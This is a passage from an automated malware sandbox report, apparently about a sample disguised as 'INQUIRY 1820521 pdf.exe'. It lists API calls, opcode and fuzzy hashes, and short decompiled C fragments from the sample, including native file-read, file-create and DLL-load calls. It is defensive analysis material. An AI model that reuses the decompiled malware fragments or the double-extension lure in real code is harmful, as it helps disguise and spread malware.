                                                    • Instruction Fuzzy Hash: 2141C271C0461CCBDB24DFA9C888BDEBBF5BF49304F108169D409AB651DBB56946CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0159CA38, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0159CAC7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: a2d813e1537a5e288c56546897d3bb0ee278dbb29be6118d22d50e4367a9c042
                                                    • Instruction ID: 8755c5450789d9432c1e4011e5e4ea0aef0e1302cfe14d2818f60afbdadd3a62
                                                    • Opcode Fuzzy Hash: a2d813e1537a5e288c56546897d3bb0ee278dbb29be6118d22d50e4367a9c042
                                                    • Instruction Fuzzy Hash: E821E5B5D00208AFDF10CF9AD885ADEBBF9FB48324F14841AE914A7710D378A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0159CA40, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0159CAC7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: e68aca42792e144bbf97b2c800da0df3b1b3aca3a324f301763e27cfc96183f3
                                                    • Instruction ID: b96a7fbe2bff87bf38d8f32326750a7a6f336adf5381f3c56ded6fdf51a0bd57
                                                    • Opcode Fuzzy Hash: e68aca42792e144bbf97b2c800da0df3b1b3aca3a324f301763e27cfc96183f3
                                                    • Instruction Fuzzy Hash: D021C4B5D012489FDF10CFAAD884ADEBBF4FB48324F14841AE914A7310D378A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05670430, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056717C1,00000800,00000000,00000000), ref: 056719D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 2fedcae5ddfb8b6d6f4bd2c6e8b9b7e0274ed67a48e9aedd31cdf49677d7a2f7
                                                    • Instruction ID: 54154ff310f9049a89f0a984f9a39a40a9169d917eb37da5849130df227b494a
                                                    • Opcode Fuzzy Hash: 2fedcae5ddfb8b6d6f4bd2c6e8b9b7e0274ed67a48e9aedd31cdf49677d7a2f7
                                                    • Instruction Fuzzy Hash: 991100B29042489FCB10CF9AD844AEEFBF4FB89320F14842AE415A7700C774A946CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05670584, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05673C65
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 978087b9171a15921eb6255d8d4b91cd58ae6e6b8b7a87b6b01b5ec52551d7d4
                                                    • Instruction ID: 4eb8ac25a62287e67237abbd0c6e735d999260f539d817314c815dc136b4cff5
                                                    • Opcode Fuzzy Hash: 978087b9171a15921eb6255d8d4b91cd58ae6e6b8b7a87b6b01b5ec52551d7d4
                                                    • Instruction Fuzzy Hash: 341103B5904248DFDB10CF99D985BEEBBF8FB48724F20881AE915A7700D374A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 056716E0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 05671746
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 98baf2362601b7612c26e7da817c415a590fc39258116573c5849b8355403cae
                                                    • Instruction ID: 573a82d1380e5e737083e3ec5559e67c5f0e39237abd6224d5a9d0d9202ab32f
                                                    • Opcode Fuzzy Hash: 98baf2362601b7612c26e7da817c415a590fc39258116573c5849b8355403cae
                                                    • Instruction Fuzzy Hash: 2211E0B6C042498FDB10CF9AD844BDEFBF8AF89224F14846AD819B7700D379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013CD124, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af1db9b45ffd328441899bdd8a7a12618798e06db61c36266b8395361ddeffca
                                                    • Instruction ID: 3f55b8b8633ea955b167edb435d184845b2998340ca67aa2e621ed311c2f4c99
                                                    • Opcode Fuzzy Hash: af1db9b45ffd328441899bdd8a7a12618798e06db61c36266b8395361ddeffca
                                                    • Instruction Fuzzy Hash: 472103B1504244EFDB06DF94D8C0B26BB65FBC8B28F24857DF9050A64AC336D846C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013CD4D8, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8023e0a8ce112850dbc0ba60262a6224c77563de1017e6c89b5325d61c35e274
                                                    • Instruction ID: 49963cbc0d79c1206ae11934a059c2d01bf60ebc589557d80589abe9fad33da9
                                                    • Opcode Fuzzy Hash: 8023e0a8ce112850dbc0ba60262a6224c77563de1017e6c89b5325d61c35e274
                                                    • Instruction Fuzzy Hash: E421F4B1504244DFDB05CF94D9C0B26BB65FB98B2CF24857DE9054B646C336D846C7E2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013DD01C, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90bd52cd4d7f70b033b0a837a5cd4dc77c0354030883eb24399ecd2d100cedd7
                                                    • Instruction ID: 84df335aee7a931de694caaf9e773c70f99fe7f3ebf544846ea66ae0efd0a513
                                                    • Opcode Fuzzy Hash: 90bd52cd4d7f70b033b0a837a5cd4dc77c0354030883eb24399ecd2d100cedd7
                                                    • Instruction Fuzzy Hash: CE2137B2608244DFCB15CF64E8C0B26BB65FBC8358F24C56DD80A4B786C336D807CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013DD1D4, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50913300fbaaf52661cab2882bf6caad5c9514c29ebc35a59780585da222fa7a
                                                    • Instruction ID: 88eeaf14c40bf03b3420e03b5f6913dbf67b71431648fb3d26a1db50ece0c3f7
                                                    • Opcode Fuzzy Hash: 50913300fbaaf52661cab2882bf6caad5c9514c29ebc35a59780585da222fa7a
                                                    • Instruction Fuzzy Hash: EB212972504244EFDB05CF94E9C0B26BB65FB88328F24C56DD8094B786C736D846CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013DD006, Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d3a9e3807c739e76d9e3f404bd9dee1ebeb30afa2701e58b26aeb33af9edcbc
                                                    • Instruction ID: 66778ba7edfcfb7a3643d5e8037f47c5fdc400c002f2848af7f0922ce3cfaffe
                                                    • Opcode Fuzzy Hash: 6d3a9e3807c739e76d9e3f404bd9dee1ebeb30afa2701e58b26aeb33af9edcbc
                                                    • Instruction Fuzzy Hash: 652184765093808FDB13CF24D994715BF71EB85214F28C5DAD8498B697C33AD44ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013CD11F, Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction ID: fa5ae5b3582a5eb86054c3faefa68ff78519f64733df03cc6748261081590cdf
                                                    • Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction Fuzzy Hash: 1911B176404280CFCB12CF54D9C4B56BF71FB84724F2486ADE8054B61BC33AD856CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013CD4D3, Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction ID: 09f8782182c606cb57a600835d08f55de8fdbd77b3959db6f763f72fd646d538
                                                    • Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction Fuzzy Hash: 4611B176504280DFCB12CF54D9C4B16BF71FB94728F2486ADE8094B656C33AD856CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013DD1CF, Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
                                                    • Instruction ID: c84cdee32fd6d1063557ce61b107b38aff1d831533a0a39f0a23f803209e44ea
                                                    • Opcode Fuzzy Hash: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
                                                    • Instruction Fuzzy Hash: A6118B76904280DFDB12CF54D5C4B15BBB1FB84228F28C6AAD8494B696C33AD44ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013CD75D, Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7285f514f5c93180eaf1ce30805459ca27be08fe718af6bf39e62c6745513f89
                                                    • Instruction ID: cea231cc2c2f7f9f4540955a40cacb3654a31e3eef889de5dae33c9fe5f788df
                                                    • Opcode Fuzzy Hash: 7285f514f5c93180eaf1ce30805459ca27be08fe718af6bf39e62c6745513f89
                                                    • Instruction Fuzzy Hash: CD01F271408394AEEB109E56DC80B66BBDCEF45A68F08846EFD081A646C7799C44C7F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 013CD75C, Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 035ecdbcdbf75553c6273fc132f28d9b2cd8ebd392dafb738746a826d8d6b0e0
                                                    • Instruction ID: 65220a42fe89f8dae60c2004c95c7290c02b394396bc95e753d5a683f4b0497b
                                                    • Opcode Fuzzy Hash: 035ecdbcdbf75553c6273fc132f28d9b2cd8ebd392dafb738746a826d8d6b0e0
                                                    • Instruction Fuzzy Hash: 76F068714042949FEB118E16CC84B62FFD8EF41A74F18C45AFD145B646C3799C44CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 056701F0, Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8c8c5f77401818e8b4b2a364145d7b4e87fcbdf652422570817fb9dd074a7a0
                                                    • Instruction ID: ee9182260077fbb020086a52347d066452bd88aadd3283369ba05cc926961777
                                                    • Opcode Fuzzy Hash: d8c8c5f77401818e8b4b2a364145d7b4e87fcbdf652422570817fb9dd074a7a0
                                                    • Instruction Fuzzy Hash: FBA17D36E0060A8FCF15CFA5C8485EDBBB2FF84310B15856AE815BB320EB31A945CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01593F48, Relevance: .2, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7fd6135909b0be1d9285a390b9ad2075190359f246fa31a0c9818a063247dba
                                                    • Instruction ID: 4c8a4f57ee7e3c5f0cab0dcd6cad638c6ee0a2998a3d5087bf2360954f2aefd8
                                                    • Opcode Fuzzy Hash: a7fd6135909b0be1d9285a390b9ad2075190359f246fa31a0c9818a063247dba
                                                    • Instruction Fuzzy Hash: 7481DE74E15219CFCB44CFA9C58499EFBF1FF88210B24956AE455EB324E334AA42CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01593F38, Relevance: .2, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb0d629ac522b38ca3d0fe02475215edaad0725b215a54134e3c8b175ad5cf14
                                                    • Instruction ID: 3114b06cbe1bfb852e0e2bf440fcb698762e6f785147bc297437f66374ad6769
                                                    • Opcode Fuzzy Hash: bb0d629ac522b38ca3d0fe02475215edaad0725b215a54134e3c8b175ad5cf14
                                                    • Instruction Fuzzy Hash: FA81D274A15219CFCB44CFA9C58499EFBF1FF88210B24856AE455EB324D334AA46CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01595368, Relevance: .2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f6a6a0d82224a3c53607e52fe5851ec3a4f36087ba89901c7c693bf46846b8d
                                                    • Instruction ID: 8c9afe66d0d16dc7538eb81d490dbf4fb096309c528754d5b88717655438a206
                                                    • Opcode Fuzzy Hash: 4f6a6a0d82224a3c53607e52fe5851ec3a4f36087ba89901c7c693bf46846b8d
                                                    • Instruction Fuzzy Hash: 6971D474E15209DFCF04CFAAC5805DEFBF2FF89210F24A82AD415BB224E7349A418B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01595359, Relevance: .2, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 735e1a48dbfb95c8ef2ad6d0e6006ee76456b696cb3a3f10648516dc4d9403cc
                                                    • Instruction ID: 2397443513c9f05c284b5c4f45d9934360389ae1dca94f719bd306497a5a45c4
                                                    • Opcode Fuzzy Hash: 735e1a48dbfb95c8ef2ad6d0e6006ee76456b696cb3a3f10648516dc4d9403cc
                                                    • Instruction Fuzzy Hash: DB71D474E156098FCF05CFAAC5805DEFBF2FF88210F24A82AD455FB254E3349A518B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01594AD8, Relevance: .2, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 89aba3ab2be78b280ae7d54e9b7bf0d807124aead7ea0dba9072caed38a3f26c
                                                    • Instruction ID: 33d056dda72b87d39f92d2d128b5251249e901a6485678b8d4f77c7a535553cd
                                                    • Opcode Fuzzy Hash: 89aba3ab2be78b280ae7d54e9b7bf0d807124aead7ea0dba9072caed38a3f26c
                                                    • Instruction Fuzzy Hash: 2971DFB4E0520ADF8F04CF99D6809AEFBF2BF48210F14996AD415BB314D734A982CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01594AC9, Relevance: .2, Instructions: 158COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9fc41e78ec9f43858ee0b3eba02b20b1b6a6aa9d55a97edb1a6593cf75a37b0a
                                                    • Instruction ID: 26c6a6a3887afe9ae6bb1327499b6e977c4f5c9e9c6768ab776aaf730a909e5d
                                                    • Opcode Fuzzy Hash: 9fc41e78ec9f43858ee0b3eba02b20b1b6a6aa9d55a97edb1a6593cf75a37b0a
                                                    • Instruction Fuzzy Hash: 5861E274E0524ADFCF04CF99D6809AEFBF2FF49210F14996AD415AB204D734A982CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01595139, Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0555ceb07d6b70e810ca5d6c1971933fd73a60019f3b717a70e1c3f7d1fc7e5a
                                                    • Instruction ID: 113ef0f3bfd78b7e5979f0e57e55e9d6f7f5de75105b3d2feb539c1d7b003d61
                                                    • Opcode Fuzzy Hash: 0555ceb07d6b70e810ca5d6c1971933fd73a60019f3b717a70e1c3f7d1fc7e5a
                                                    • Instruction Fuzzy Hash: 0A4106B4E1420A9FCF45CFAAC9805AEFBF2FF89310F14C46AC415AB254E33496518F91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01595610, Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0588c8d4a7cef4a7243b7773ae5475ae75cd43dd0abd7e6e447849e2d68efa2b
                                                    • Instruction ID: d73f1e4eb5d3fc053571489be54156bdd06281d3e6bfc745b5722a825e43c7ec
                                                    • Opcode Fuzzy Hash: 0588c8d4a7cef4a7243b7773ae5475ae75cd43dd0abd7e6e447849e2d68efa2b
                                                    • Instruction Fuzzy Hash: 23410670E1520ADBCF45CFAAD5805AEFBF2BF88300F24C56AC515BB214E7349A518F95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01595148, Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7f214455ec74012d4c8fb18215a3e84e1f6ce4cc2857bad449946ef5a0521ab
                                                    • Instruction ID: 95d992c490005070dc948bd776750e7a974a249c26de3f5f9f50052371f34d6d
                                                    • Opcode Fuzzy Hash: b7f214455ec74012d4c8fb18215a3e84e1f6ce4cc2857bad449946ef5a0521ab
                                                    • Instruction Fuzzy Hash: 074105B4D1420A9BCF49CFAAD9805EEFBF2BF89310F14C46AD415AB244E3349A518F91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01595600, Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4292e3778195dc1b596fd07f82d0f800dfe8e21ef16be66f380590efa824549
                                                    • Instruction ID: 6302c78cc90007ce81754984d1ed0060bec480873f5fa16e036cf1270b585327
                                                    • Opcode Fuzzy Hash: c4292e3778195dc1b596fd07f82d0f800dfe8e21ef16be66f380590efa824549
                                                    • Instruction Fuzzy Hash: 88412870E1520ACFCF45CFA9D5805AEFBF2BF89300F24C5AAC905BB214E7349A558B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: INQUIRY 1820521 pdf.exe PID: 1664 Parent PID: 6928 INQUIRY 1820521 pdf.exeCOMMON

                                                    Executed Functions

                                                    Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                    0x00419e13
                                                    0x00419e1f
                                                    0x00419e27
                                                    0x00419e32
                                                    0x00419e4d
                                                    0x00419e55
                                                    0x00419e59

                                                    APIs
                                                    • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: BMA$BMA
                                                    • API String ID: 2738559852-2163208940
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(_v8, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                    0x0040acec
                                                    0x0040acef
                                                    0x0040acf4
                                                    0x0040acf9
                                                    0x0040ad03
                                                    0x0040ad08
                                                    0x0040ad0b
                                                    0x0040ad0d
                                                    0x0040ad15
                                                    0x0040ad1a
                                                    0x0040ad1a
                                                    0x0040ad21
                                                    0x0040ad29
                                                    0x0040ad2c
                                                    0x0040ad2e
                                                    0x0040ad42
                                                    0x00000000
                                                    0x0040ad44
                                                    0x0040ad4a
                                                    0x0040acfe
                                                    0x0040acfe
                                                    0x0040acfe

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                    • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                    • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                    • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419D5E, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00419D5E(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				long _t22;
				void* _t34;

				asm("popad");
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E0041A960(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                    0x00419d5e
                                                    0x00419d63
                                                    0x00419d6f
                                                    0x00419d77
                                                    0x00419dad
                                                    0x00419db1

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 9fb6d5cf8033083e821a85d69c0850c8ec19bd1986aa25cad4d00bda3a7d1b40
                                                    • Instruction ID: 9880a526e56240ea0f4ac79fd56460f737fbec01edf1ec3d18cd5859d8e407c5
                                                    • Opcode Fuzzy Hash: 9fb6d5cf8033083e821a85d69c0850c8ec19bd1986aa25cad4d00bda3a7d1b40
                                                    • Instruction Fuzzy Hash: 9501B2B2201108AFCB18CF99DC95EEB77A9AF8C754F158248FA4DE7241C630E851CBA4
